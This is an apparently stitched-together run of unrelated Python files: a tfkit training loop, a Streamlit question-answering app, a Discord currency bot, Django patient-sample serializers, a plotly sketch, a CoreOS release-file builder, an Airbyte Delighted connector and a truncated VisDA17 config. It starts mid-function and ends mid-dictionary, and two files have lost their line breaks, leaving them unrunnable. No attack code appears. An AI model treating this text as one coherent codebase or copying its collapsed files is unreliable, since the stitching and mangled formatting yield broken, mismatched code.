            for model, batch in zip(models, iters):
                test_batch = next(batch, None)
                if test_batch is not None:
                    loss = model(test_batch)
                    loss = loss / input_arg.get('grad_accum')
                    t_loss += loss.mean().detach()
                    t_length += 1
                    pbar.update(1)
                else:
                    end = True
        pbar.close()

    avg_t_loss = t_loss / t_length if t_length > 0 else 0
    logger.write_log(f"model: {fname}, Total Loss: {avg_t_loss}")
    logger.write_metric("eval_loss/step", avg_t_loss, epoch)
    return avg_t_loss


def load_model_and_datas(tokenizer, pretrained, accelerator, model_arg, input_arg):
    models = []
    train_dataset = []
    test_dataset = []
    train_ds_maxlen = 0
    test_ds_maxlen = 0
    for model_class_name, train_file, test_file in zip_longest(input_arg.get('model'), input_arg.get('train'),
                                                               input_arg.get('test'), fillvalue=""):
        # get model class
        model_class = load_model_class(model_class_name)
        # load dataset
        ds_parameter = {**model_arg, **input_arg}
        train_ds = get_dataset(train_file, model_class, tokenizer, ds_parameter)
        test_ds = get_dataset(test_file, model_class, tokenizer, ds_parameter)
        # load model
        model = model_class.Model(tokenizer=tokenizer, pretrained=pretrained, tasks_detail=train_ds.task,
                                  maxlen=input_arg.get('maxlen'), **model_arg)
        # track the largest dataset so multi-task sampling can balance to it
        train_ds_maxlen = max(train_ds_maxlen, len(train_ds))
        test_ds_maxlen = max(test_ds_maxlen, len(test_ds))
        train_dataset.append(train_ds)
        test_dataset.append(test_ds)
        models.append(model)

    return models, train_dataset, test_dataset, train_ds_maxlen, test_ds_maxlen
def main(arg=None):
    input_arg, model_arg = parse_train_args(sys.argv[1:]) if arg is None else parse_train_args(arg)
    accelerator = Accelerator()
    nlp2.get_dir_with_notexist_create(input_arg.get('savedir'))
    logger = Logger(savedir=input_arg.get('savedir'), tensorboard=input_arg.get('tensorboard', False),
                    wandb=input_arg.get('wandb', False), print_fn=accelerator.print)
    logger.write_log("Accelerator")
    logger.write_log("=======================")
    logger.write_log(accelerator.state)
    logger.write_log("=======================")
    nlp2.set_seed(input_arg.get('seed'))
    tokenizer = load_pretrained_tokenizer(input_arg.get('config'))
    pretrained = load_pretrained_model(input_arg.get('config'), input_arg.get('model'))
    if input_arg.get('maxlen') == 0:
        input_arg.update({'maxlen': pretrained.config.max_position_embeddings})

    # handling add tokens
    add_tokens = None
    if input_arg.get('add_tokens_freq', None):
        logger.write_log("Calculating Unknown Token")
        add_tokens = tok.get_freqK_unk_token(tokenizer, input_arg.get('train') + input_arg.get('test'),
                                             input_arg.get('add_tokens_freq'))
    if input_arg.get('add_tokens_file', None):
        logger.write_log("Add token from file")
        add_tokens = nlp2.read_files_into_lines(input_arg.get('add_tokens_file'))
    if add_tokens:
        pretrained, tokenizer = tfkit.utility.model.add_tokens_to_pretrain(pretrained, tokenizer, add_tokens)

    # load model and data
    models_tag = input_arg.get('tag') if input_arg.get('tag', None) is not None else [
        m.lower() + "_" + str(ind) for ind, m in enumerate(input_arg.get('model'))]
    models, train_dataset, test_dataset, train_ds_maxlen, test_ds_maxlen = load_model_and_datas(
        tokenizer, pretrained, accelerator, model_arg, input_arg)
    # balance sample for multi-task
    for ds in train_dataset:
        ds.increase_with_sampling(train_ds_maxlen)
    for ds in test_dataset:
        ds.increase_with_sampling(test_ds_maxlen)

    logger.write_config(input_arg)
    logger.write_log("TRAIN PARAMETER")
    logger.write_log("=======================")
    for key, value in input_arg.items():
        logger.write_log(str(key) + " : " + str(value))
    logger.write_log("=======================")

    train_dataloaders = [data.DataLoader(dataset=ds, batch_size=input_arg.get('batch'), shuffle=True,
                                         pin_memory=False, collate_fn=dataloader_collate,
                                         num_workers=input_arg.get('worker')) for ds in train_dataset]
    test_dataloaders = [data.DataLoader(dataset=ds, batch_size=input_arg.get('batch'), shuffle=False,
                                        pin_memory=False, collate_fn=dataloader_collate,
                                        num_workers=input_arg.get('worker')) for ds in test_dataset]

    # loading model back
    start_epoch = 1
    if input_arg.get('resume'):
        logger.write_log(f"Loading back: {input_arg.get('resume')}")
        package = torch.load(input_arg.get('resume'))
        if 'model_state_dict' in package:
            models[0].load_state_dict(package['model_state_dict'])
        else:
            if len(models) != len(package['models']) and not input_arg.get('tag'):
                raise Exception(
                    f"resuming from a multi-task model, you should specify which task to use with --tag, from {package['tags']}")
            elif len(models) != len(package['models']):
                tags = input_arg.get('tag')
            else:
                tags = package['tags']
            for ind, model_tag in enumerate(tags):
                tag_ind = package['tags'].index(model_tag)
                models[ind].load_state_dict(package['models'][tag_ind])
        start_epoch = int(package.get('epoch', 1)) + 1

    # train/eval loop
    logger.write_log("training batch : " + str(input_arg.get('batch') * input_arg.get('grad_accum')))
    for epoch in range(start_epoch, start_epoch + input_arg.get('epoch')):
        start_time = time.time()
        fname = os.path.join(input_arg.get('savedir'), str(epoch))

        logger.write_log(f"=========train at epoch={epoch}=========")
        try:
            train_avg_loss = model_train(models, train_dataloaders, models_tag, input_arg, epoch, logger, accelerator)
            logger.write_metric("train_loss/epoch", train_avg_loss, epoch)
        except KeyboardInterrupt:
            save_model(models, input_arg, models_tag, epoch, fname + "_interrupt", logger,
                       add_tokens=add_tokens, accelerator=accelerator)

        logger.write_log(f"=========save at epoch={epoch}=========")
        save_model(models, input_arg, models_tag, epoch, fname, logger, add_tokens=add_tokens,
                   accelerator=accelerator)

        if input_arg.get('no_eval') is False:
            logger.write_log(f"=========eval at epoch={epoch}=========")
            eval_avg_loss = model_eval(models, test_dataloaders, fname, input_arg, epoch, logger, accelerator)
            logger.write_metric("eval_loss/epoch", eval_avg_loss, epoch)
        logger.write_log(f"=== Epoch execution time: {timedelta(seconds=(time.time() - start_time))} ===")


if __name__ == "__main__":
    main()
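# Example invocation (illustrative; the dataset paths and the task name are
# assumptions -- valid task names come from tfkit.utility.model.list_all_model()):
#   python3 train.py --train data/train.csv --test data/test.csv \
#       --model clas --config bert-base-multilingual-cased \
#       --batch 16 --epoch 5 --savedir checkpoints/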
import functools
from typing import Dict
import base64

import streamlit as st  # type: ignore
import wikipedia  # type: ignore
from transformers import Pipeline, pipeline  # type: ignore

from config import config


def conditional_decorator(func):
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        if config["framework"] == "pt":
            qa = st.cache(func)(*args, **kwargs)
        else:
            qa = func(*args, **kwargs)
        return qa
    return wrapper


@conditional_decorator
def get_qa_pipeline() -> Pipeline:
    qa = pipeline("question-answering", framework=config["framework"])
    return qa


@conditional_decorator
def answer_question(pipeline: Pipeline, question: str, paragraph: str) -> Dict:
    # renamed from `input` to avoid shadowing the built-in
    payload = {"question": question, "context": paragraph}
    return pipeline(payload)


@conditional_decorator
def get_wiki_paragraph(query: str) -> str:
    results = wikipedia.search(query)
    try:
        summary = wikipedia.summary(results[0], sentences=config["NUM_SENT"])
    except wikipedia.DisambiguationError as e:
        ambiguous_terms = e.options
        return wikipedia.summary(ambiguous_terms[0], sentences=config["NUM_SENT"])
    return summary


def format_text(paragraph: str, start_idx: int, end_idx: int) -> str:
    return (
        paragraph[:start_idx]
        + "**"
        + paragraph[start_idx:end_idx]
        + "**"
        + paragraph[end_idx:]
    )


# +
def get_html(html: str) -> str:
    # The original file called get_html() without defining it anywhere; this
    # pass-through stand-in (an assumption, not the upstream helper) keeps
    # get_svg(wrap=True) from raising NameError.
    return html


def get_svg(svg: str, style: str = "", wrap: bool = True):
    """Convert an SVG to a base64-encoded image."""
    b64 = base64.b64encode(svg.encode("utf-8")).decode("utf-8")
    html = f'<img src="data:image/svg+xml;base64,{b64}" style="{style}"/>'
    return get_html(html) if wrap else html


if __name__ == "__main__":
    """
    # cXsquare Lite
    """
    #LOGO_SVG = """<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 900 500 175" width="1500" height="530"><path fill="#09A3D5" d="M64.8 970.6c-11.3-1.3-12.2-16.5-26.7-15.2-7 0-13.6 2.9-13.6 9.4 0 9.7 15 10.6 24.1 13.1 15.4 4.7 30.4 7.9 30.4 24.7 0 21.3-16.7 28.7-38.7 28.7-18.4 0-37.1-6.5-37.1-23.5 0-4.7 4.5-8.4 8.9-8.4 5.5 0 7.5 2.3 9.4 6.2 4.3 7.5 9.1 11.6 21 11.6 7.5 0 15.3-2.9 15.3-9.4 0-9.3-9.5-11.3-19.3-13.6-17.4-4.9-32.3-7.4-34-26.7-1.8-32.9 66.7-34.1 70.6-5.3-.3 5.2-5.2 8.4-10.3 8.4zm81.5-28.8c24.1 0 37.7 20.1 37.7 44.9 0 24.9-13.2 44.9-37.7 44.9-13.6 0-22.1-5.8-28.2-14.7v32.9c0 9.9-3.2 14.7-10.4 14.7-8.8 0-10.4-5.6-10.4-14.7v-95.6c0-7.8 3.3-12.6 10.4-12.6 6.7 0 10.4 5.3 10.4 12.6v2.7c6.8-8.5 14.6-15.1 28.2-15.1zm-5.7 72.8c14.1 0 20.4-13 20.4-28.2 0-14.8-6.4-28.2-20.4-28.2-14.7 0-21.5 12.1-21.5 28.2.1 15.7 6.9 28.2 21.5 28.2zm59.8-49.3c0-17.3 19.9-23.5 39.2-23.5 27.1 0 38.2 7.9 38.2 34v25.2c0 6 3.7 17.9 3.7 21.5 0 5.5-5 8.9-10.4 8.9-6 0-10.4-7-13.6-12.1-8.8 7-18.1 12.1-32.4 12.1-15.8 0-28.2-9.3-28.2-24.7 0-13.6 9.7-21.4 21.5-24.1 0 .1 37.7-8.9 37.7-9 0-11.6-4.1-16.7-16.3-16.7-10.7 0-16.2 2.9-20.4 9.4-3.4 4.9-2.9 7.8-9.4 7.8-5.1 0-9.6-3.6-9.6-8.8zm32.2 51.9c16.5 0 23.5-8.7 23.5-26.1v-3.7c-4.4 1.5-22.4 6-27.3 6.7-5.2 1-10.4 4.9-10.4 11 .2 6.7 7.1 12.1 14.2 12.1zM354 909c23.3 0 48.6 13.9 48.6 36.1 0 5.7-4.3 10.4-9.9 10.4-7.6 0-8.7-4.1-12.1-9.9-5.6-10.3-12.2-17.2-26.7-17.2-22.3-.2-32.3 19-32.3 42.8 0 24 8.3 41.3 31.4 41.3 15.3 0 23.8-8.9 28.2-20.4 1.8-5.3 4.9-10.4 11.6-10.4 5.2 0 10.4 5.3 10.4 11 0 23.5-24 39.7-48.6 39.7-27 0-42.3-11.4-50.6-30.4-4.1-9.1-6.7-18.4-6.7-31.4-.4-36.4 20.8-61.6 56.7-61.6zm133.3 32.8c6 0 9.4 3.9 9.4 9.9 0 2.4-1.9 7.3-2.7 9.9l-28.7 75.4c-6.4 16.4-11.2 27.7-32.9 27.7-10.3 0-19.3-.9-19.3-9.9 0-5.2 3.9-7.8 9.4-7.8 1 0 2.7.5 3.7.5 1.6 0 2.7.5 3.7.5 10.9 0 12.4-11.2 16.3-18.9l-27.7-68.5c-1.6-3.7-2.7-6.2-2.7-8.4 0-6 4.7-10.4 11-10.4 7 0 9.8 5.5 11.6 11.6l18.3 54.3 18.3-50.2c2.7-7.8 3-15.7 12.3-15.7z" /> </svg>"""
    #LOGO = get_svg(LOGO_SVG, wrap=False, style="max-width: 100%; margin-bottom: 25px")
    #st.image()
    st.sidebar.image('CX.png', width=200, use_column_width=True)
    #st.sidebar.markdown(LOGO, unsafe_allow_html=True)
    paragraph_slot = st.empty()
    wiki_query = st.text_area("Enter the Paragraph", "", height=300)
    #paragraph_slot.markdown(wiki_query)
    question = st.text_input("Enter the question", "")

    if wiki_query:
        #wiki_para = get_wiki_paragraph(wiki_query)
        # Execute question against paragraph
        if question != "":
            pipeline = get_qa_pipeline()
            try:
                answer = answer_question(pipeline, question, wiki_query)
                start_idx = answer["start"]
                end_idx = answer["end"]
                st.success(answer["answer"])
                print(f"NUM SENT: {config['NUM_SENT']}")
                print(f"FRAMEWORK: {config['framework']}")
                print(f"QUESTION: {question}\nRESPONSE: {answer}")
            except Exception as e:
                print(e)
                st.warning("Answer not found")
# -
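# The app is meant to be launched through Streamlit rather than plain Python,
# e.g. (the file name is an assumption):
#   streamlit run app.py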
import discord
import json
import http3


class currency():
    async def currencyConverter(self, message):
        messageArray = message.content.split(" ")
        if(not len(messageArray) == 3):
            await message.channel.send("Incorrect number of parameters! Format currency requests as `>currency <amount> <currency code>`")
            return
        try:
            int(messageArray[1])
        except ValueError:
            # a bare except here would also swallow unrelated errors
            await message.channel.send(f"{messageArray[1]} is not a valid number!")
            return
        if(messageArray[2].upper() not in ["CAD", "HKD", "ISK", "PHP", "DKK", "HUF", "CZK", "AUD", "RON", "SEK", "IDR", "INR", "BRL", "RUB", "HRK", "JPY", "THB", "CHF", "EUR", "SGD", "PLN", "BGN", "TRY", "CNY", "NOK", "NZD", "ZAR", "USD", "MXN", "ILS", "GBP", "KRW", "MYR"]):
            await message.channel.send(f"{messageArray[2]} is an unknown currency type!")
            return
        await message.channel.send("Making GET request, please hold...")
        curStats = await self.makeTheRequest(messageArray)
        USD = round(curStats["rates"]["USD"] * int(messageArray[1]), 2)
        AUD = round(curStats["rates"]["AUD"] * int(messageArray[1]), 2)
        ZAR = round(curStats["rates"]["ZAR"] * int(messageArray[1]), 2)
        BGN = round(curStats["rates"]["BGN"] * int(messageArray[1]), 2)
        PLN = round(curStats["rates"]["PLN"] * int(messageArray[1]), 2)
        NZD = round(curStats["rates"]["NZD"] * int(messageArray[1]), 2)
        GBP = round(curStats["rates"]["GBP"] * int(messageArray[1]), 2)
        # the API typically omits the base currency from "rates", so when the
        # base is EUR the amount passes through unchanged
        EUR = int(messageArray[1])
        if ("EUR" in curStats["rates"]):
            EUR = round(curStats["rates"]["EUR"] * int(messageArray[1]), 2)
        sendMessage = f"```py\nConverting {messageArray[1]} {messageArray[2].upper()}:\n"
        sendMessage += f"United States Dollar: {USD}\n"
        sendMessage += f"Australian Dollar: {AUD}\n"
        sendMessage += f"South African Rand: {ZAR}\n"
        sendMessage += f"Bulgarian Lev: {BGN}\n"
        sendMessage += f"Polish złoty: {PLN}\n"
        sendMessage += f"New Zealand Dollar: {NZD}\n"
        sendMessage += f"Euro: {EUR}\n"
        sendMessage += f"Great Britain Pound: {GBP}\n"
        sendMessage += "```"
        await message.channel.send(sendMessage)

    async def makeTheRequest(self, infoList):
        client = http3.AsyncClient()
        response = await client.get(f"https://api.exchangeratesapi.io/latest?base={infoList[2].upper()}")
        responseData = response.text
        responseData = json.loads(responseData)
        return responseData
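# The exchangeratesapi.io response keys "rates" by target currency relative to
# the requested base, so each conversion above is a single multiply, e.g. for
# ">currency 50 EUR" with rates["USD"] == 1.08 (illustrative figure only):
#   round(1.08 * 50, 2) == 54.0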
from django.utils import timezone
from rest_framework import serializers
from rest_framework.exceptions import ValidationError

from care.facility.api.serializers import TIMESTAMP_FIELDS
from care.facility.api.serializers.facility import FacilityBasicInfoSerializer
from care.facility.models import PatientConsultation, PatientRegistration, Facility
from care.facility.models.patient_sample import SAMPLE_TYPE_CHOICES, PatientSample, PatientSampleFlow
from care.utils.serializer.external_id_field import ExternalIdSerializerField
from config.serializers import ChoiceField


class PatientSampleFlowSerializer(serializers.ModelSerializer):
    status = ChoiceField(choices=PatientSample.SAMPLE_TEST_FLOW_CHOICES, required=False)

    class Meta:
        model = PatientSampleFlow
        fields = "__all__"


class PatientSampleSerializer(serializers.ModelSerializer):
    id = serializers.UUIDField(source="external_id", read_only=True)

    patient_name = serializers.CharField(read_only=True, source="patient.name")
    patient_has_sari = serializers.BooleanField(read_only=True, source="patient.has_SARI")
    patient_has_confirmed_contact = serializers.BooleanField(
        read_only=True, source="patient.contact_with_confirmed_carrier"
    )
    patient_has_suspected_contact = serializers.BooleanField(
        read_only=True, source="patient.contact_with_suspected_carrier"
    )
    patient_travel_history = serializers.CharField(read_only=True, source="patient.countries_travelled")

    facility = ExternalIdSerializerField(read_only=True, source="consultation.facility")
    facility_object = FacilityBasicInfoSerializer(source="consultation.facility", read_only=True)

    sample_type = ChoiceField(choices=SAMPLE_TYPE_CHOICES, required=False)
    status = ChoiceField(choices=PatientSample.SAMPLE_TEST_FLOW_CHOICES, required=False)
    result = ChoiceField(choices=PatientSample.SAMPLE_TEST_RESULT_CHOICES, required=False)
    icmr_category = ChoiceField(choices=PatientSample.PATIENT_ICMR_CATEGORY, required=False)

    patient = ExternalIdSerializerField(required=False, queryset=PatientRegistration.objects.all())
    consultation = ExternalIdSerializerField(required=False, queryset=PatientConsultation.objects.all())

    date_of_sample = serializers.DateTimeField(required=False)
    date_of_result = serializers.DateTimeField(required=False)

    notes = serializers.CharField(required=False, allow_blank=True)

    testing_facility = ExternalIdSerializerField(queryset=Facility.objects.all(), required=False)
    testing_facility_object = FacilityBasicInfoSerializer(source="testing_facility", read_only=True)

    class Meta:
        model = PatientSample
        read_only_fields = (
            "id",
            "facility",
        )
        exclude = TIMESTAMP_FIELDS + ("external_id",)

    def create(self, validated_data):
        validated_data.pop("status", None)
        validated_data.pop("result", None)
        return super(PatientSampleSerializer, self).create(validated_data)


class PatientSamplePatchSerializer(PatientSampleSerializer):
    notes = serializers.CharField(required=False)

    def update(self, instance, validated_data):
        try:
            is_completed = validated_data.get("result") in [1, 2]
            new_status = validated_data.get(
                "status", PatientSample.SAMPLE_TEST_FLOW_MAP["COMPLETED"] if is_completed else None
            )
            choice = PatientSample.SAMPLE_TEST_FLOW_CHOICES[new_status - 1][1]
            if is_completed:
                validated_data["status"] = PatientSample.SAMPLE_TEST_FLOW_MAP["COMPLETED"]
        except (KeyError, TypeError):
            # TypeError covers new_status being None (no status supplied and the
            # result does not mark the test complete); report it as a missing
            # field instead of letting it surface as a server error
            raise ValidationError({"status": ["is required"]})

        valid_choices = PatientSample.SAMPLE_FLOW_RULES[PatientSample.SAMPLE_TEST_FLOW_CHOICES[instance.status - 1][1]]
        if choice not in valid_choices:
            raise ValidationError({"status": [f"Next valid choices are: {', '.join(valid_choices)}"]})
        if choice != "COMPLETED" and validated_data.get("result"):
            raise ValidationError({"result": ["Result can't be updated unless test is complete"]})
        if choice == "COMPLETED" and not validated_data.get("result"):
            raise ValidationError({"result": ["is required as the test is complete"]})
        if validated_data.get("result") is None and validated_data.get("date_of_result") is not None:
            raise ValidationError({"date_of_result": ["cannot be provided without result"]})

        if not instance.date_of_sample and validated_data.get("status") in [
            # the misspelled keys below ("COLLECTON", "FORWARED") match the
            # model's SAMPLE_TEST_FLOW_MAP constants, so they are left as-is
            PatientSample.SAMPLE_TEST_FLOW_MAP[key]
            for key in ["SENT_TO_COLLECTON_CENTRE", "RECEIVED_AND_FORWARED", "RECEIVED_AT_LAB"]
        ]:
            validated_data["date_of_sample"] = timezone.now()
        elif validated_data.get("status") == PatientSample.SAMPLE_TEST_FLOW_MAP["REQUEST_SUBMITTED"]:
            validated_data["result"] = PatientSample.SAMPLE_TEST_RESULT_MAP["AWAITING"]
        elif validated_data.get("result") is not None and validated_data.get("date_of_result") is None:
            validated_data["date_of_result"] = timezone.now()

        return super().update(instance, validated_data)


class PatientSampleDetailSerializer(PatientSampleSerializer):
    flow = serializers.ListSerializer(child=PatientSampleFlowSerializer())
    facility_object = FacilityBasicInfoSerializer(source="consultation.facility")
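# Note on the status-flow check above: SAMPLE_TEST_FLOW_CHOICES is treated as
# 1-indexed (hence the `new_status - 1` lookup), and SAMPLE_FLOW_RULES maps
# each status label to the labels allowed to follow it. The shape below is an
# assumption for illustration; the real tables live on the PatientSample model:
#   SAMPLE_FLOW_RULES = {"REQUEST_SUBMITTED": {"APPROVED", "DENIED"}, ...}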
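# --- Illustrative sketch (standalone, plotly only; names are hypothetical) ---
# The script above fakes a Gantt-style timeline with barmode='stack': an
# invisible bar covers the span up to each row's start date, and the visible
# bar is stacked on top of it. A minimal reproduction of that trick:
import datetime
import plotly.graph_objs as go

rows = ['contract A', 'contract B']
starts = [datetime.date(2015, 10, 1), datetime.date(2015, 11, 1)]
ends = [datetime.date(2015, 12, 1), datetime.date(2016, 1, 15)]
origin = min(starts)

invisible = go.Bar(y=rows, x=[(s - origin).days for s in starts],
                   orientation='h', marker=dict(color='rgba(0, 0, 0, 0.0)'))
visible = go.Bar(y=rows, x=[(e - s).days for s, e in zip(starts, ends)],
                 orientation='h', marker=dict(color='rgba(55, 128, 191, 0.7)'))
fig = go.Figure(data=[invisible, visible],
                layout=go.Layout(barmode='stack', showlegend=False))
# fig.show()  # uncomment to render the two horizontal spans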
#!/usr/bin/env python3 from argparse import ArgumentParser, FileType from datetime import datetime import json import os def ensure_dup(inp, out, inp_key, out_key): ''' If the out dictionary does not contain a value for out_key update it to be equal to the inp dictionaries inp_key value, if it does exist ensure the values are equal between the two dictionaries ''' if out.get(out_key, None) == None: out[out_key] = inp.get(inp_key) if out.get(out_key) != inp.get(inp_key): raise Exception("Input Files do not appear to be for the same release") def url_builder(stream, version, arch, path): return f"https://builds.coreos.fedoraproject.org/prod/streams/{stream}/builds/{version}/{arch}/{path}" def get_extension(path, modifier, arch): return path.rsplit(f'{modifier}.{arch}')[1][1:] parser = ArgumentParser() parser.add_argument("--workdir", help="cosa workdir", required=True) parser.add_argument("--build-id", help="build id", required=False) args = parser.parse_args() arches = [] with open(os.path.join(args.workdir, "builds", "builds.json"), 'r') as build_file: build_json = json.load(build_file) if len(build_json.get('builds', [])) > 0: individual_build = {} if args.build_id is None: individual_build = build_json.get('builds')[0] args.build_id = individual_build.get('id') else: for build in build_json.get('builds'): if build.get('id') == args.build_id: individual_build = build break print(f"Creating release.json for build {individual_build['id']} ") arches = individual_build.get('arches') outer_dir = os.path.join(args.workdir, "builds", args.build_id) release_file = os.path.join(outer_dir, "release.json") out = {} if os.path.exists(release_file): with open(release_file, 'r') as w: out = json.load(w) print(f"Using existing release file {release_file}") files = [os.path.join(outer_dir, arch, "meta.json") for arch in arches] for f in files: with open(f, 'r') as w: input_ = json.load(w) arch = input_.get("coreos-assembler.basearch") ensure_dup(input_, out, "buildid", "release") ensure_dup(input_.get('coreos-assembler.container-config-git'), out, 'branch', 'stream') def artifact(i): base_url = url_builder(out.get('stream'), out.get('release'), arch, i.get('path')) return { "location": base_url, "signature": "{}.sig".format(base_url), "sha256": i.get("sha256") } print(f"{out['stream']} stream") print(f" {arch} images:") # build the architectures dict arch_dict = {"media": {}} ensure_dup(input_, arch_dict, "ostree-commit", "commit") generic_arches = ["aliyun", "aws", "azure", "qemu", "metal", "openstack", "vmware", "gcp"] for ga in generic_arches: if input_.get("images", {}).get(ga, None) is not None: print(f" - {ga}") i = input_.get("images").get(ga) ext = get_extension(i.get('path'), ga, arch) arch_dict['media'][ga] = { "artifacts": { ext: { "disk": artifact(i) } } } # AMI specific additions if input_.get("amis", None) is not None: arch_dict["media"]["aws"] = arch_dict["media"].get("aws", {}) arch_dict["media"]["aws"]["images"] = arch_dict["media"]["aws"].get("images", {}) for ami_dict in input_.get("amis"): arch_dict["media"]["aws"]["images"][ami_dict["name"]] = { "image": ami_dict["hvm"] } # metal specific additions arch_dict["media"]["metal"] = arch_dict["media"].get("metal", {}) arch_dict["media"]["metal"]["artifacts"] = arch_dict["media"]["metal"].get("artifacts", {}) i = input_.get("images", {}).get("iso", None) if i is not None: arch_dict["media"]["metal"]["artifacts"]["installer.iso"] = { "disk": artifact(i) } i = input_.get("images", {}).get("kernel", None) if i is not None: 
arch_dict["media"]["metal"]["artifacts"].setdefault("installer-pxe", {})["kernel"] = artifact(i) i = input_.get("images", {}).get("initramfs", None) if i is not None: arch_dict["media"]["metal"]["artifacts"].setdefault("installer-pxe", {})["initramfs"] = artifact(i) i = input_.get("images", {}).get("live-iso", None) if i is not None: arch_dict["media"]["metal"]["artifacts"]["iso"] = { "disk": artifact(i) } i = input_.get("images", {}).get("live-kernel", None) if i is not None: arch_dict["media"]["metal"]["artifacts"].setdefault("pxe", {})["kernel"] = artifact(i) i = input_.get("images", {}).get("live-initramfs", None) if i is not None: arch_dict["media"]["metal"]["artifacts"].setdefault("pxe", {})["initramfs"] = artifact(i) # if architectures as a whole or the individual arch is empty just push our changes if out.get('architectures', None) is None or out['architectures'].get(arch, None) is None: oa = out.get('architectures', {}) oa[arch] = arch_dict out['architectures'] = oa # else check media warning if key present, appending if not else: out_arch = out['architectures'][arch] for media_type, val in arch_dict.get('media').items(): if media_type not in out_arch['media']: out['architectures'][arch]['media'].update({media_type: val}) elif val == out_arch['media'][media_type]: continue else: raise Exception("differing content detected for media type '{}'".format(media_type)) with open(release_file, 'w') as w: json.dump(out, w) print(f"Successfully wrote release file at {release_file}")
# # Copyright (c) 2021 Airbyte, Inc., all rights reserved. # import base64 from abc import ABC from typing import Any, Iterable, List, Mapping, MutableMapping, Optional, Tuple from urllib.parse import parse_qsl, urlparse import requests from airbyte_cdk.models import SyncMode from airbyte_cdk.sources import AbstractSource from airbyte_cdk.sources.streams import Stream from airbyte_cdk.sources.streams.http import HttpStream from airbyte_cdk.sources.streams.http.auth import TokenAuthenticator # Basic full refresh stream class DelightedStream(HttpStream, ABC): url_base = "https://api.delighted.com/v1/" # Page size limit = 100 page = 1 # Define primary key to all streams as primary key primary_key = "id" def __init__(self, since: int, **kwargs): super().__init__(**kwargs) self.since = since def next_page_token(self, response: requests.Response) -> Optional[Mapping[str, Any]]: response_data = response.json() if len(response_data) == self.limit: self.page += 1 return {"page": self.page} def request_params( self, stream_state: Mapping[str, Any], stream_slice: Mapping[str, any] = None, next_page_token: Mapping[str, Any] = None ) -> MutableMapping[str, Any]: params = {"per_page": self.limit, "since": self.since} if next_page_token: params.update(**next_page_token) return params def parse_response(self, response: requests.Response, **kwargs) -> Iterable[Mapping]: yield from response.json() class IncrementalDelightedStream(DelightedStream, ABC): # Getting page size as 'limit' from parent class @property def limit(self): return super().limit state_checkpoint_interval = limit @property def cursor_field(self) -> str: return "created_at" def get_updated_state(self, current_stream_state: MutableMapping[str, Any], latest_record: Mapping[str, Any]) -> Mapping[str, Any]: return {self.cursor_field: max(latest_record.get(self.cursor_field, 0), current_stream_state.get(self.cursor_field, 0))} def request_params(self, stream_state=None, **kwargs): stream_state = stream_state or {} params = super().request_params(stream_state=stream_state, **kwargs) if stream_state: params["since"] = stream_state.get(self.cursor_field) return params def parse_response(self, response: requests.Response, stream_state: Mapping[str, Any], **kwargs) -> Iterable[Mapping]: for record in super().parse_response(response=response, stream_state=stream_state, **kwargs): if self.cursor_field not in stream_state or record[self.cursor_field] > stream_state[self.cursor_field]: yield record class People(IncrementalDelightedStream): """ API docs: https://app.delighted.com/docs/api/listing-people """ def path(self, **kwargs) -> str: return "people.json" def next_page_token(self, response: requests.Response) -> Optional[Mapping[str, Any]]: # Getting next page link next_page = response.links.get("next", None) if next_page: return {"page_info": dict(parse_qsl(urlparse(next_page.get("url")).query)).get("page_info")} class Unsubscribes(IncrementalDelightedStream): """ API docs: https://app.delighted.com/docs/api/listing-unsubscribed-people """ cursor_field = "unsubscribed_at" primary_key = "person_id" def path(self, **kwargs) -> str: return "unsubscribes.json" class Bounces(IncrementalDelightedStream): """ API docs: https://app.delighted.com/docs/api/listing-bounced-people """ cursor_field = "bounced_at" primary_key = "person_id" def path(self, **kwargs) -> str: return "bounces.json" class SurveyResponses(IncrementalDelightedStream): """ API docs: https://app.delighted.com/docs/api/listing-survey-responses """ cursor_field = "updated_at" def path(self, 
**kwargs) -> str: return "survey_responses.json" def request_params(self, stream_state=None, **kwargs): stream_state = stream_state or {} params = super().request_params(stream_state=stream_state, **kwargs) if "since" in params: params["updated_since"] = params.pop("since") if stream_state: params["updated_since"] = stream_state.get(self.cursor_field) return params # Source class SourceDelighted(AbstractSource): def _get_authenticator(self, config): token = base64.b64encode(f"{config['api_key']}:".encode("utf-8")).decode("utf-8") return TokenAuthenticator(token=token, auth_method="Basic") def check_connection(self, logger, config) -> Tuple[bool, any]: """ Testing connection availability for the connector. :param config: the user-input config object conforming to the connector's spec.json :param logger: logger object :return Tuple[bool, any]: (True, None) if the input config can be used to connect to the API successfully, (False, error) otherwise. """ try: auth = self._get_authenticator(config) args = {"authenticator": auth, "since": config["since"]} stream = SurveyResponses(**args) records = stream.read_records(sync_mode=SyncMode.full_refresh) next(records) return True, None except Exception as e: return False, e def streams(self, config: Mapping[str, Any]) -> List[Stream]: auth = self._get_authenticator(config) args = {"authenticator": auth, "since": config["since"]} return [ Bounces(**args), People(**args), SurveyResponses(**args), Unsubscribes(**args), ]
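# --- Illustrative sketch (standalone; the key below is a dummy value) ---
# Delighted authenticates with HTTP Basic auth: the API key is the username
# and the password is empty, which is why _get_authenticator() above encodes
# "<api_key>:" and wraps it in a Basic TokenAuthenticator.
import base64


def basic_token(api_key: str) -> str:
    return base64.b64encode(f"{api_key}:".encode("utf-8")).decode("utf-8")


assert basic_token("abc123") == "YWJjMTIzOg=="
# The resulting request header is: Authorization: Basic YWJjMTIzOg==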
"""Configs for VisDA17 experiments.""" def get_weighting_config_class_pareto(alpha, reverse, seed): return { 'name': 'class_pareto', 'kwargs': { 'alpha': alpha, 'reverse': reverse, 'seed': seed }, } def get_dataset_config_visda17_pareto_target_imbalance(alpha, seed=None): return { 'name': 'VisDA17', 'val_fraction': 0.15, 'mods': [], 'source': { 'index': 0, 'weighting': { 'name': 'class_uniform', 'kwargs': dict(), }, 'subsample': True, }, 'target': { 'index': 1, 'weighting': get_weighting_config_class_pareto(alpha, True, seed=seed), 'subsample': True, }, } def get_algorithm_config(algorithm, extra_hparams=None, extra_discriminator_hparams=None): # Common configs of all algorithms config = { 'name': algorithm, 'hparams': { 'da_network': { 'feature_extractor': { 'name': 'ResNet', 'hparams': { 'feature_dim': 256, 'pretrained': True, 'freeze_bn': False, 'resnet18': False, 'resnet_dropout': 0.0, 'fc_lr_factor': 1.0, 'fc_wd_factor': 1.0, } }, 'classifier': { 'name': 'LogLossClassifier', 'hparams': { 'num_hidden': None, 'special_init': True, } }, }, 'discriminator': { 'hparams': { 'num_hidden': 1024, 'depth': 3, 'spectral': False, 'history_size': 0, } }, 'ema_momentum': None, 'fx_opt': { 'name': 'SGD', 'kwargs': { 'lr': 0.001, 'momentum': 